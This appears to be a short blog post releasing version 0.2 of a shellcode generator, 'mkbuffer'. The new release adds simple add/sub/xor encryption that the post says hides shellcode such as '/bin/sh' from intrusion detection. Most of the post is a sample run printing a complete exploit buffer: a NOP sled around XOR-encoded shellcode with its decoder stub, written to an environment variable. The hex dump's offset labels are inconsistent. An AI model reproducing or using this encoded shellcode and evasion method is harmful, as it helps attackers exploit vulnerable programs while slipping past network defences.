mkbuffer0.2

Updated my shellcode generation tool. Added shellcode encryption, to hide from IDS which scan for well known strings in the shellcode, like ‘/bin/sh’. The encryption is quite simple, just add,sub,xor or move by an fixed offset. The tool added also a hook to decode the shellcode before it gets called.

Changelog:

  • Use getopt for command line parsing
  • Fixed off by one bug in hex dump output
  • Added simple shellcode encryption

./mkbuffer -m gen -l 256 -c xor -o 2 -f CODE -e CODE
------------------------------------------------------
Start: 0x0x80499a0
End:   0x0x80499c9
Len:   0x0029 (41 bytes)
jump:  0x00000000
------------------------------------------------------
Crypt Shellcode 'xor' offset='2'
------------------------------------------------------
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:eb 11 5e 31 c9 b1 36 80 74 0e ff 02 80 e9 01 75
0x0075:f6 eb 05 e8 ea ff ff ff 33 c2 b2 44 33 d9 33 cb
0x00cb:cf 82 e9 12 59 33 c2 8a 41 05 52 51 8b e3 b2 09
0x0009:33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a
0x006a:5a 92 92 92 57 8b e7 55 54 33 f4 51 ea 8c 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
------------------------------------------------------
Writing Shellcode to 'CODE'
------------------------------------------------------
Starting Subshell
setup env $CODE
------------------------------------------------------


Download

Leave a Reply

Your email address will not be published. Required fields are marked *